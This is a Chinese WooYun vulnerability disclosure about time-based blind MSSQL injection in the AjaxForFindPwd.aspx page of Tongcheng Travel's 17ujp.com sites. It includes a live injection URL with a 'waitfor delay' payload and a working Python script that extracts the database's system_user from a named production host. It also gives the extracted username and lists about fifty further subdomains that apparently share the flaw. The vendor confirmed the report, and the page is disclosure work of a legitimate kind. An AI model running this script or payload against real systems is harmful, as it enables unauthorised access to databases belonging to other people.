当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-088834

漏洞标题:同程旅游网多个站点同类MSSQL注射(附验证脚本)

相关厂商:苏州同程旅游网络科技有限公司

漏洞作者: lijiejie

提交时间:2014-12-26 20:28

修复时间:2015-02-09 20:30

公开时间:2015-02-09 20:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-12-26: 细节已通知厂商并且等待厂商处理中
2014-12-26: 厂商已经确认,细节仅向厂商公开
2015-01-05: 细节向核心白帽子及相关领域专家公开
2015-01-15: 细节向普通白帽子公开
2015-01-25: 细节向实习白帽子公开
2015-02-09: 细节向公众公开

简要描述:

同程旅游网多站点同类MSSQL注射(附验证脚本)

详细说明:

注入点:

http://17349886.17ujp.com/Admin/AjaxForFindPwd.aspx?IsReseller=0&_=1419585952016&Account=123'; if (len(system_user)=10) waitfor delay '0:0:10'--


以上是猜解system_user长度为10

漏洞证明:

逐字符猜解system_user,得到:

17ujpadmin


17u_mssqli_2.png


验证脚本:

#encoding=gbk
import httplib
import time
import string
import sys
import random
import urllib
headers = {
    'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
}
payloads = list(string.ascii_lowercase)
for i in range(0,10):
    payloads.append(str(i))
payloads += ['@','_', '.', '-', '\\', ' ']
print 'Try to retrive user:'
user = ''
for i in range(1,11):
    for payload in payloads:
        try:
            conn = httplib.HTTPConnection('17349886.17ujp.com', timeout=3)
            s = "if (ascii(substring(system_user,%s,1))=%s) waitfor delay '0:0:3' --" % (i, ord(payload))
            params = "IsReseller=0&_=1419585952016&Account=123';" + urllib.quote(s)
            conn.request(method='GET', url= '/Admin/AjaxForFindPwd.aspx?' + params,
                         headers = headers)
            html_doc = conn.getresponse().read()
            conn.close()
            print '.',
        except Exception, e:
            user += payload
            print '\nIn progress]', user
            break
        
print '\n[Done] User is:', user


应该是域名泛解析,发现多个站点都存在该注射:

http://18377290.17ujp.com
http://35369309.ctt.17ujp.com
http://19871649.17ujp.com
http://35369309.ct.17ujp.com
http://1534423.17ujp.com
http://33365104.ct.17ujp.com
http://14479454.17ujp.com
http://1134230.17ujp.com
http://1184097.17ujp.com
http://1393336.17ujp.com
http://1334783.17ujp.com
http://36403811.17ujp.com
http://1190222.17ujp.com
http://95241.17ujp.com
http://35369309.17ujp.com
http://33365104.17ujp.com
http://1702437.ctt.17ujp.com
http://1578794.17ujp.com
http://8446.17ujp.com
http://16687718.17ujp.com
http://1381187.17ujp.com
http://1191850.17ujp.com
http://1196320.17ujp.com
http://9938.17ujp.com
http://66405.17ujp.com
http://1191850.ct.17ujp.com
http://17349886.17ujp.com
http://1191850.ctt.17ujp.com
http://2340837.17ujp.com
http://1191850.cnc.17ujp.com
http://4045321.17ujp.com
http://9938.ctt.17ujp.com
http://39100370.17ujp.com
http://9938.cnc.17ujp.com
http://1186224.17ujp.com
http://9938.ct.17ujp.com
http://1373099.17ujp.com
http://980655.17ujp.com
http://1792227.ct.17ujp.com
http://1702437.17ujp.com
http://1792227.ctt.17ujp.com
http://1186435.17ujp.com
http://1792227.cnc.17ujp.com
http://1702437.ct.17ujp.com
http://26751655.ctt.17ujp.com
http://1702437.cnc.17ujp.com
http://26751655.ct.17ujp.com
http://1157668.17ujp.com
http://26751655.cnc.17ujp.com
http://1539098.17ujp.com
http://10873993.ctt.17ujp.com

修复方案:

过滤

版权声明:转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-12-26 20:55

厂商回复:

感谢关注同程旅游,已在安排修复,谢谢李姐姐。

最新状态:

暂无

漏洞评价:

评论

  1. 2014-12-26 20:31 | CoffeeSafe ( 普通白帽子 | Rank:142 漏洞数:37 )

    前排!

  2. 2014-12-26 20:33 | 疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)

    前排!

  3. 2014-12-26 20:38 | 途牛旅游网(乌云厂商)

    放开他,冲我来!

  4. 2014-12-26 23:54 | 0x_Jin ( 普通白帽子 | Rank:319 漏洞数:37 | 微博:http://weibo.com/J1n9999)

    李姐姐你又来了

  5. 2015-01-06 09:27 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    李姐姐就是厉害

  6. 2015-01-07 14:58 | 帅气小狼狗 ( 路人 | Rank:8 漏洞数:2 | 汪汪汪)

    @途牛旅游网 你们是基友吗?